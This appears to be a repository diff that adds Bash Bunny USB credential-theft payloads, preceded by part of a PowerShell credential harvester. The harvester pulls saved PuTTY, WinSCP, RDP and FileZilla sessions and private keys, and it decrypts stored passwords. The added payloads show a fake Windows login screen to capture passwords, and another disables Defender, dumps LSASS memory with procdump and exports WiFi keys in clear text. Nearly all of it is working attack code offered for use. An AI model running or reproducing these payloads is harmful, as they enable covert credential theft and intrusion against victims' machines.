$ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList
$ArrayOfRDPSessions = New-Object System.Collections.ArrayList
$ArrayOfRDPFiles = New-Object System.Collections.ArrayList
$ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList
$objUser = (GetMappedSID)
$Source = (Hostname) + "\" + (Split-Path $objUser.Value -Leaf)
$UserObject | Add-Member -MemberType NoteProperty -Name "Source" -Value $objUser.Value
# Construct PuTTY, WinSCP, RDP, FileZilla session paths from base key
$PuTTYPath = Join-Path $Hive.PSPath "\$PuTTYPathEnding"
$WinSCPPath = Join-Path $Hive.PSPath "\$WinSCPPathEnding"
$MicrosoftRDPPath = Join-Path $Hive.PSPath "\$RDPPathEnding"
$FileZillaPath = "C:\Users\" + (Split-Path -Leaf $UserObject."Source") + "\AppData\Roaming\FileZilla\sitemanager.xml"
$SuperPuTTYPath = "C:\Users\" + (Split-Path -Leaf $UserObject."Source") + "\Documents\SuperPuTTY\Sessions.xml"
if (Test-Path $FileZillaPath) {
[xml]$FileZillaXML = Get-Content $FileZillaPath
(ProcessFileZillaFile $FileZillaXML)
}
if (Test-Path $SuperPuTTYPath) {
[xml]$SuperPuTTYXML = Get-Content $SuperPuTTYPath
(ProcessSuperPuTTYFile $SuperPuTTYXML)
}
if (Test-Path $MicrosoftRDPPath) {
# Aggregates all saved sessions from that user's RDP client
$AllRDPSessions = Get-ChildItem $MicrosoftRDPPath
(ProcessRDPLocal $AllRDPSessions)
} # If (Test-Path MicrosoftRDPPath)
if (Test-Path $WinSCPPath) {
# Aggregates all saved sessions from that user's WinSCP client
$AllWinSCPSessions = Get-ChildItem $WinSCPPath
(ProcessWinSCPLocal $AllWinSCPSessions)
} # If (Test-Path WinSCPPath)
if (Test-Path $PuTTYPath) {
# Aggregates all saved sessions from that user's PuTTY client
$AllPuTTYSessions = Get-ChildItem $PuTTYPath
(ProcessPuTTYLocal $AllPuTTYSessions)
} # If (Test-Path PuTTYPath)
} # For each Hive in UserHives
# If run in Thorough Mode
if ($Everything) {
# Contains raw i-node data for files with extension .ppk, .rdp, and sdtid respectively, found by Get-ChildItem
$PPKExtensionFilesINodes = New-Object System.Collections.ArrayList
$RDPExtensionFilesINodes = New-Object System.Collections.ArrayList
$sdtidExtensionFilesINodes = New-Object System.Collections.ArrayList
# All drives found on system in one variable
$AllDrives = Get-PSDrive
(ProcessThoroughLocal $AllDrives)
(ProcessPPKFile $PPKExtensionFilesINodes)
(ProcessRDPFile $RDPExtensionFilesINodes)
(ProcesssdtidFile $sdtidExtensionFilesINodes)
} # If Thorough
} # Else -- run SessionGopher locally
} # Invoke-SessionGopher
####################################################################################
####################################################################################
## Registry Querying Helper Functions
####################################################################################
####################################################################################
# Maps the SID from HKEY_USERS to a username through the HKEY_LOCAL_MACHINE hive
function GetMappedSID {
# If getting SID from remote computer
if ($Inputlist -or $ComputerName -or $AllDomain) {
# Get the username for SID we discovered has saved sessions
$SIDPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$SID"
$Value = "ProfileImagePath"
(Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM,$SIDPath,$Value @optionalCreds).sValue
# Else, get local SIDs
} else {
# Converts user SID in HKEY_USERS to username
$SID = (Split-Path $Hive.Name -Leaf)
$objSID = New-Object System.Security.Principal.SecurityIdentifier("$SID")
$objSID.Translate( [System.Security.Principal.NTAccount])
}
}
function DownloadAndExtractFromRemoteRegistry($File) {
# The following code is taken from Christopher Truncer's WMIOps script on GitHub. It gets file contents through WMI by
# downloading the file's contents to the remote computer's registry, and then extracting the value from that registry location
$fullregistrypath = "HKLM:\Software\Microsoft\DRM"
$registrydownname = "ReadMe"
$regpath = "SOFTWARE\Microsoft\DRM"
# On remote system, save file to registry
Write-Verbose "Reading remote file and writing on remote registry"
$remote_command = '$fct = Get-Content -Encoding byte -Path ''' + "$File" + '''; $fctenc = [System.Convert]::ToBase64String($fct); New-ItemProperty -Path ' + "'$fullregistrypath'" + ' -Name ' + "'$registrydownname'" + ' -Value $fctenc -PropertyType String -Force'
$remote_command = 'powershell -nop -exec bypass -c "' + $remote_command + '"'
$null = Invoke-WmiMethod -class win32_process -Name Create -Argumentlist $remote_command -ComputerName $RemoteComputer @optionalCreds
# Sleeping to let remote system read and store file
Start-Sleep -s 15
$remote_reg = ""
# Grab file from remote system's registry
$remote_reg = Invoke-WmiMethod -Namespace 'root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM, $regpath, $registrydownname -Computer $RemoteComputer @optionalCreds
$decoded = [System.Convert]::FromBase64String($remote_reg.sValue)
$UTF8decoded = [System.Text.Encoding]::UTF8.GetString($decoded)
# Removing Registry value from remote system
$null = Invoke-WmiMethod -Namespace 'root\default' -Class 'StdRegProv' -Name 'DeleteValue' -Argumentlist $reghive, $regpath, $registrydownname -ComputerName $RemoteComputer @optionalCreds
$UTF8decoded
}
####################################################################################
####################################################################################
## File Processing Helper Functions
####################################################################################
####################################################################################
function ProcessThoroughLocal($AllDrives) {
foreach ($Drive in $AllDrives) {
# If the drive holds a filesystem
if ($Drive.Provider.Name -eq "FileSystem") {
$Dirs = Get-ChildItem $Drive.Root -Recurse -ErrorAction SilentlyContinue
foreach ($Dir in $Dirs) {
Switch ($Dir.Extension) {
".ppk" {[void]$PPKExtensionFilesINodes.Add($Dir)}
".rdp" {[void]$RDPExtensionFilesINodes.Add($Dir)}
".sdtid" {[void]$sdtidExtensionFilesINodes.Add($Dir)}
}
}
}
}
}
function ProcessThoroughRemote($FilePathsFound) {
foreach ($FilePath in $FilePathsFound) {
# Each object we create for the file extension found from a -Thorough search will have the same properties (Source, Path to File)
$EverythingObject = "" | Select-Object -Property Source,Path
$EverythingObject.Source = $RemoteComputer
$Extension = [IO.Path]::GetExtension($FilePath.Name)
if ($Extension -eq ".ppk") {
$EverythingObject.Path = $FilePath.Name
[void]$ArrayofPPKFiles.Add($EverythingObject)
} elseif ($Extension -eq ".rdp") {
$EverythingObject.Path = $FilePath.Name
[void]$ArrayofRDPFiles.Add($EverythingObject)
} elseif ($Extension -eq ".sdtid") {
$EverythingObject.Path = $FilePath.Name
[void]$ArrayofsdtidFiles.Add($EverythingObject)
}
}
if ($ArrayOfPPKFiles.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfRDPFiles
if ($OutCSV) {
$ArrayOfPPKFiles | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY ppk Files.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Private Key Files (.ppk)"
$ArrayOfPPKFiles | Format-List | Out-String
}
}
if ($ArrayOfRDPFiles.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Files" -Value $ArrayOfRDPFiles
if ($OutCSV) {
$ArrayOfRDPFiles | Export-CSV -Append -Path ($OutputDirectory + "\Microsoft rdp Files.csv") -NoTypeInformation
} else {
Write-Output "Microsoft RDP Connection Files (.rdp)"
$ArrayOfRDPFiles | Format-List | Out-String
}
}
if ($ArrayOfsdtidFiles.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "sdtid Files" -Value $ArrayOfsdtidFiles
if ($OutCSV) {
$ArrayOfsdtidFiles | Export-CSV -Append -Path ($OutputDirectory + "\RSA sdtid Files.csv") -NoTypeInformation
} else {
Write-Output "RSA Tokens (sdtid)"
$ArrayOfsdtidFiles | Format-List | Out-String
}
}
} # ProcessThoroughRemote
function ProcessPuTTYLocal($AllPuTTYSessions) {
# For each PuTTY saved session, extract the information we want
foreach($Session in $AllPuTTYSessions) {
$PuTTYSessionObject = "" | Select-Object -Property Source,Session,Hostname
$PuTTYSessionObject.Source = $Source
$PuTTYSessionObject.Session = (Split-Path $Session -Leaf)
$PuTTYSessionObject.Hostname = ((Get-ItemProperty -Path ("Microsoft.PowerShell.Core\Registry::" + $Session) -Name "Hostname" -ErrorAction SilentlyContinue).Hostname)
# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
[void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)
}
if ($OutCSV) {
$ArrayOfPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Sessions"
$ArrayOfPuTTYSessions | Format-List | Out-String
}
# Add the array of PuTTY session objects to UserObject
$UserObject | Add-Member -MemberType NoteProperty -Name "PuTTY Sessions" -Value $ArrayOfPuTTYSessions
} # ProcessPuTTYLocal
function ProcessRDPLocal($AllRDPSessions) {
# For each RDP saved session, extract the information we want
foreach($Session in $AllRDPSessions) {
$PathToRDPSession = "Microsoft.PowerShell.Core\Registry::" + $Session
$MicrosoftRDPSessionObject = "" | Select-Object -Property Source,Hostname,Username
$MicrosoftRDPSessionObject.Source = $Source
$MicrosoftRDPSessionObject.Hostname = (Split-Path $Session -Leaf)
$MicrosoftRDPSessionObject.Username = ((Get-ItemProperty -Path $PathToRDPSession -Name "UsernameHint" -ErrorAction SilentlyContinue).UsernameHint)
# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
[void]$ArrayOfRDPSessions.Add($MicrosoftRDPSessionObject)
} # For each Session in AllRDPSessions
if ($OutCSV) {
$ArrayOfRDPSessions | Export-CSV -Append -Path ($OutputDirectory + "\RDP.csv") -NoTypeInformation
} else {
Write-Output "Microsoft Remote Desktop (RDP) Sessions"
$ArrayOfRDPSessions | Format-List | Out-String
}
# Add the array of RDP session objects to UserObject
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Sessions" -Value $ArrayOfRDPSessions
} #ProcessRDPLocal
function ProcessWinSCPLocal($AllWinSCPSessions) {
# For each WinSCP saved session, extract the information we want
foreach($Session in $AllWinSCPSessions) {
$PathToWinSCPSession = "Microsoft.PowerShell.Core\Registry::" + $Session
$WinSCPSessionObject = "" | Select-Object -Property Source,Session,Hostname,Username,Password
$WinSCPSessionObject.Source = $Source
$WinSCPSessionObject.Session = (Split-Path $Session -Leaf)
$WinSCPSessionObject.Hostname = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Hostname" -ErrorAction SilentlyContinue).Hostname)
$WinSCPSessionObject.Username = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Username" -ErrorAction SilentlyContinue).Username)
$WinSCPSessionObject.Password = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Password" -ErrorAction SilentlyContinue).Password)
if ($WinSCPSessionObject.Password) {
$MasterPassUsed = ((Get-ItemProperty -Path (Join-Path $Hive.PSPath "SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Security") -Name "UseMasterPassword" -ErrorAction SilentlyContinue).UseMasterPassword)
# If the user is not using a master password, we can crack it:
if (!$MasterPassUsed) {
$WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)
# Else, the user is using a master password. We can't retrieve plaintext credentials for it.
} else {
$WinSCPSessionObject.Password = "Saved in session, but master password prevents plaintext recovery"
}
}
# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
[void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)
} # For each Session in AllWinSCPSessions
if ($OutCSV) {
$ArrayOfWinSCPSessions | Export-CSV -Append -Path ($OutputDirectory + "\WinSCP.csv") -NoTypeInformation
} else {
Write-Output "WinSCP Sessions"
$ArrayOfWinSCPSessions | Format-List | Out-String
}
# Add the array of WinSCP session objects to the target user object
$UserObject | Add-Member -MemberType NoteProperty -Name "WinSCP Sessions" -Value $ArrayOfWinSCPSessions
} # ProcessWinSCPLocal
function ProcesssdtidFile($sdtidExtensionFilesINodes) {
foreach ($Path in $sdtidExtensionFilesINodes.VersionInfo.FileName) {
$sdtidFileObject = "" | Select-Object -Property "Source","Path"
$sdtidFileObject."Source" = $Source
$sdtidFileObject."Path" = $Path
[void]$ArrayOfsdtidFiles.Add($sdtidFileObject)
}
if ($ArrayOfsdtidFiles.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "sdtid Files" -Value $ArrayOfsdtidFiles
if ($OutCSV) {
$ArrayOfsdtidFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\RSA sdtid Files.csv") -NoTypeInformation
} else {
Write-Output "RSA Tokens (sdtid)"
$ArrayOfsdtidFiles | Select-Object * | Format-List | Out-String
}
}
} # Process sdtid File
function ProcessRDPFile($RDPExtensionFilesINodes) {
# Extracting the filepath from the i-node information stored in RDPExtensionFilesINodes
foreach ($Path in $RDPExtensionFilesINodes.VersionInfo.FileName) {
$RDPFileObject = "" | Select-Object -Property "Source","Path","Hostname","Gateway","Prompts for Credentials","Administrative Session"
$RDPFileObject."Source" = (Hostname)
# The next several lines use regex pattern matching to store relevant info from the .rdp file into our object
$RDPFileObject."Path" = $Path
$RDPFileObject."Hostname" = try { (Select-String -Path $Path -Pattern "full address:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
$RDPFileObject."Gateway" = try { (Select-String -Path $Path -Pattern "gatewayhostname:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
$RDPFileObject."Administrative Session" = try { (Select-String -Path $Path -Pattern "administrative session:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
$RDPFileObject."Prompts for Credentials" = try { (Select-String -Path $Path -Pattern "prompt for credentials:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
if (!$RDPFileObject."Administrative Session" -or !$RDPFileObject."Administrative Session" -eq 0) {
$RDPFileObject."Administrative Session" = "Does not connect to admin session on remote host"
} else {
$RDPFileObject."Administrative Session" = "Connects to admin session on remote host"
}
if (!$RDPFileObject."Prompts for Credentials" -or $RDPFileObject."Prompts for Credentials" -eq 0) {
$RDPFileObject."Prompts for Credentials" = "No"
} else {
$RDPFileObject."Prompts for Credentials" = "Yes"
}
[void]$ArrayOfRDPFiles.Add($RDPFileObject)
}
if ($ArrayOfRDPFiles.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Files" -Value $ArrayOfRDPFiles
if ($OutCSV) {
$ArrayOfRDPFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\Microsoft rdp Files.csv") -NoTypeInformation
} else {
Write-Output "Microsoft RDP Connection Files (.rdp)"
$ArrayOfRDPFiles | Select-Object * | Format-List | Out-String
}
}
} # Process RDP File
function ProcessPPKFile($PPKExtensionFilesINodes) {
# Extracting the filepath from the i-node information stored in PPKExtensionFilesINodes
foreach ($Path in $PPKExtensionFilesINodes.VersionInfo.FileName) {
# Private Key Encryption property identifies whether the private key in this file is encrypted or if it can be used as is
$PPKFileObject = "" | Select-Object -Property "Source","Path","Protocol","Comment","Private Key Encryption","Private Key","Private MAC"
$PPKFileObject."Source" = (Hostname)
# The next several lines use regex pattern matching to store relevant info from the .ppk file into our object
$PPKFileObject."Path" = $Path
$PPKFileObject."Protocol" = try { (Select-String -Path $Path -Pattern ": (.*)" -Context 0,0).Matches.Groups[1].Value } catch {}
$PPKFileObject."Private Key Encryption" = try { (Select-String -Path $Path -Pattern "Encryption: (.*)").Matches.Groups[1].Value } catch {}
$PPKFileObject."Comment" = try { (Select-String -Path $Path -Pattern "Comment: (.*)").Matches.Groups[1].Value } catch {}
$NumberOfPrivateKeyLines = try { (Select-String -Path $Path -Pattern "Private-Lines: (.*)").Matches.Groups[1].Value } catch {}
$PPKFileObject."Private Key" = try { (Select-String -Path $Path -Pattern "Private-Lines: (.*)" -Context 0,$NumberOfPrivateKeyLines).Context.PostContext -Join "" } catch {}
$PPKFileObject."Private MAC" = try { (Select-String -Path $Path -Pattern "Private-MAC: (.*)").Matches.Groups[1].Value } catch {}
# Add the object we just created to the array of .ppk file objects
[void]$ArrayOfPPKFiles.Add($PPKFileObject)
}
if ($ArrayOfPPKFiles.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfPPKFiles
if ($OutCSV) {
$ArrayOfPPKFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY ppk Files.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Private Key Files (.ppk)"
$ArrayOfPPKFiles | Select-Object * | Format-List | Out-String
}
}
} # Process PPK File
function ProcessFileZillaFile($FileZillaXML) {
# Locate all <Server> nodes (aka session nodes), iterate over them
foreach($FileZillaSession in $FileZillaXML.SelectNodes('//FileZilla3/Servers/Server')) {
# Hashtable to store each session's data
$FileZillaSessionHash = @{}
# Iterates over each child node under <Server> (aka session)
$FileZillaSession.ChildNodes | ForEach-Object {
$FileZillaSessionHash["Source"] = $Source
# If value exists, make a key-value pair for it in the hash table
if ($_.InnerText) {
if ($_.Name -eq "Pass") {
$FileZillaSessionHash["Password"] = $_.InnerText
} else {
# Populate session data based on the node name
$FileZillaSessionHash[$_.Name] = $_.InnerText
}
}
}
# Create object from collected data, excluding some trivial information
[void]$ArrayOfFileZillaSessions.Add((New-Object PSObject -Property $FileZillaSessionHash | Select-Object -Property * -ExcludeProperty "#text",LogonType,Type,BypassProxy,SyncBrowsing,PasvMode,DirectoryComparison,MaximumMultipleConnections,EncodingType,TimezoneOffset,Colour))
} # ForEach FileZillaSession in FileZillaXML.SelectNodes()
# base64_decode the stored encoded session passwords, and decode protocol
foreach ($Session in $ArrayOfFileZillaSessions) {
$Session.Password = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Session.Password))
if ($Session.Protocol -eq "0") {
$Session.Protocol = "Use FTP over TLS if available"
} elseif ($Session.Protocol -eq 1) {
$Session.Protocol = "Use SFTP"
} elseif ($Session.Protocol -eq 3) {
$Session.Protocol = "Require implicit FTP over TLS"
} elseif ($Session.Protocol -eq 4) {
$Session.Protocol = "Require explicit FTP over TLS"
} elseif ($Session.Protocol -eq 6) {
$Session.Protocol = "Only use plain FTP (insecure)"
}
}
if ($OutCSV) {
$ArrayOfFileZillaSessions | Export-CSV -Append -Path ($OutputDirectory + "\FileZilla.csv") -NoTypeInformation
} else {
Write-Output "FileZilla Sessions"
$ArrayOfFileZillaSessions | Format-List | Out-String
}
# Add the array of FileZilla session objects to the target user object
$UserObject | Add-Member -MemberType NoteProperty -Name "FileZilla Sessions" -Value $ArrayOfFileZillaSessions
} # ProcessFileZillaFile
function ProcessSuperPuTTYFile($SuperPuTTYXML) {
foreach($SuperPuTTYSessions in $SuperPuTTYXML.ArrayOfSessionData.SessionData) {
foreach ($SuperPuTTYSession in $SuperPuTTYSessions) {
if ($SuperPuTTYSession -ne $null) {
$SuperPuTTYSessionObject = "" | Select-Object -Property "Source","SessionId","SessionName","Host","Username","ExtraArgs","Port","Putty Session"
$SuperPuTTYSessionObject."Source" = $Source
$SuperPuTTYSessionObject."SessionId" = $SuperPuTTYSession.SessionId
$SuperPuTTYSessionObject."SessionName" = $SuperPuTTYSession.SessionName
$SuperPuTTYSessionObject."Host" = $SuperPuTTYSession.Host
$SuperPuTTYSessionObject."Username" = $SuperPuTTYSession.Username
$SuperPuTTYSessionObject."ExtraArgs" = $SuperPuTTYSession.ExtraArgs
$SuperPuTTYSessionObject."Port" = $SuperPuTTYSession.Port
$SuperPuTTYSessionObject."PuTTY Session" = $SuperPuTTYSession.PuttySession
[void]$ArrayOfSuperPuTTYSessions.Add($SuperPuTTYSessionObject)
}
}
} # ForEach SuperPuTTYSessions
if ($OutCSV) {
$ArrayOfSuperPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + "\SuperPuTTY.csv") -NoTypeInformation
} else {
Write-Output "SuperPuTTY Sessions"
$ArrayOfSuperPuTTYSessions | Out-String
}
# Add the array of SuperPuTTY session objects to the target user object
$UserObject | Add-Member -MemberType NoteProperty -Name "SuperPuTTY Sessions" -Value $ArrayOfSuperPuTTYSessions
} # ProcessSuperPuTTYFile
####################################################################################
####################################################################################
## WinSCP Deobfuscation Helper Functions
####################################################################################
####################################################################################
# Gets all domain-joined computer names and properties in one object
function GetComputersFromActiveDirectory {
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
if ($ExcludeDC) {
Write-Verbose "Skipping enumeration against the Domain Controller(s) for stealth."
$Filter = "(&(objectCategory=computer)(!userAccountControl:1.2.840.113556.1.4.803:=8192))"
} else {
$Filter = "(objectCategory=computer)"
}
$objSearcher.Filter = $Filter
$colProplist = "name"
foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$objSearcher.FindAll()
}
function DecryptNextCharacterWinSCP($remainingPass) {
# Creates an object with flag and remainingPass properties
$flagAndPass = "" | Select-Object -Property flag,remainingPass
# Shift left 4 bits equivalent for backwards compatibility with older PowerShell versions
$firstval = ("0123456789ABCDEF".indexOf($remainingPass[0]) * 16)
$secondval = "0123456789ABCDEF".indexOf($remainingPass[1])
$Added = $firstval + $secondval
$decryptedResult = (((-bnot ($Added -bxor $Magic)) % 256) + 256) % 256
$flagAndPass.flag = $decryptedResult
$flagAndPass.remainingPass = $remainingPass.Substring(2)
$flagAndPass
}
function DecryptWinSCPPassword($SessionHostname, $SessionUsername, $Password) {
$CheckFlag = 255
$Magic = 163
$len = 0
$key = $SessionHostname + $SessionUsername
$values = DecryptNextCharacterWinSCP($Password)
$storedFlag = $values.flag
if ($values.flag -eq $CheckFlag) {
$values.remainingPass = $values.remainingPass.Substring(2)
$values = DecryptNextCharacterWinSCP($values.remainingPass)
}
$len = $values.flag
$values = DecryptNextCharacterWinSCP($values.remainingPass)
$values.remainingPass = $values.remainingPass.Substring(($values.flag * 2))
$finalOutput = ""
for ($i=0; $i -lt $len; $i++) {
$values = (DecryptNextCharacterWinSCP($values.remainingPass))
$finalOutput += [char]$values.flag
}
if ($storedFlag -eq $CheckFlag) {
$finalOutput.Substring($key.length)
}
$finalOutput
}

BIN
payloads/library/credentials/SessionBunny/censorepic.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 51 KiB

44
payloads/library/credentials/SessionBunny/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: SessionBunny
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 500
Q DELAY 1000
Q STRING "powershell -exec bypass"
Q DELAY 500
Q ENTER
Q DELAY 250
Q STRING "Import-Module((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\SessionBunny.ps1')"
Q DELAY 250
Q ENTER
Q DELAY 250
Q STRING "Invoke-SessionBunny -Everything"
Q DELAY 250
Q ENTER
LED FINISH

394
payloads/library/credentials/Win_PoSH_FakeLogin/L.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

22
payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Fake Login
# Description: Shows a fake login screen
# Author: Cribbit
# Version: 1.0
# Category: Credentials
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK DELAY 500
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
LED FINISH

45
payloads/library/credentials/Win_PoSH_FakeLogin/readme.md Normal file
View File

@ -0,0 +1,45 @@
# Fake Login
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Credentials
- Attackmode: HID & Storage
- Extensions: Run
- Props: PanicAcid for testing multi-screen desktops, Foxtrot and Other Hak5 Discord members
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Shows a fake login screen. Saves the entered value to the loots folder on the bunny.
## Config
This payload contains 9 base64 encode images.
If you do not wish to use them you could have the files on the bunny and do something like this:
```powershell
$BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
```
or if you have web hosting or a http server running on the bunny then you can do something like:
```powershell
$R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg';
$BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);
```
## To Do
Adding a To Do section just in case someone (or me if I can be bothered) want to fix some issues:
- Fade between time panel 1 and login panel 2
- The beginnings of the code are there but has too much noticeable flicker.
- Disable notifications as they display over the form:
- HKEY\_LOCAL\_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Explorer, this Explorer needs to be created, Dword32 “DisableNotificationCenter”, value as 1.
- HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications, "ToastEnabled" DWORD 0 = Turn off
- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.AutoPlay, "Enabled" = 0
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |

38
payloads/library/credentials/ducked/duck_code.txt Normal file
View File

@ -0,0 +1,38 @@
DELAY 5000
GUI d
DELAY 1200
GUI r
DELAY 1200
STRING powershell -nologo -noni -ep bypass
CTRL-SHIFT ENTER
DELAY 2000
LEFT
DELAY 1000
ENTER
DELAY 1000
STRING mode con:cols=100 lines=1
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
ENTER
DELAY 200
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
ENTER
DELAY 35000
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
ENTER
DELAY 1000
STRING echo "Successful PWNd..."
ENTER
DELAY 1000
STRING eject
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
DELAY 1000
STRING exit
ENTER

9
payloads/library/credentials/ducked/payload.txt Normal file
View File

@ -0,0 +1,9 @@
#!/bin/bash
LED SETUP
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
LED ATTACK
LED R B
QUACK switch1/duck_code.txt
sync;sleep 1;sync
LED FINISH
LED G

13574
payloads/library/credentials/ducked/procdump.txt Normal file
View File

File diff suppressed because it is too large Load Diff

159
payloads/library/credentials/ducked/run.ps1 Normal file
View File

@ -0,0 +1,159 @@
## ##
## Ducked script by scaery v.1.0 ##
## ________ __ .___ ##
## \______ \ __ __ ____ | | __ ____ __| _/ ##
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
## | ` \ | /\ \___| <\ ___// /_/ | ##
## /_______ /____/ \___ >__|_ \\___ >____ | ##
## \/ \/ \/ \/ \/ ##
## ##
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
## ##
####################################################################
$switch = "switch1"
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
$usb_loot = "loot\"
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
$loot = $usb + $usb_loot + $env:computername + "_" + $date
$usb_create = New-Item -ItemType directory $loot
$proc = "$usb\payloads\$switch\procdump.txt"
$proc_decode = certutil -decode $proc exec.exe
$procdump = "$usb\payloads\$switch\exec.exe"
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
$lines="------------------------------------------"
function whost($a) {
Write-Host
Write-Host -ForegroundColor Green $lines
Write-Host -ForegroundColor Green " "$a
Write-Host -ForegroundColor Green $lines
}
whost "Windows Enumeration Script v 0.1
original by absolomb
modified by scaery
!!!!!!!!!"
$commands = [ordered]@{
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
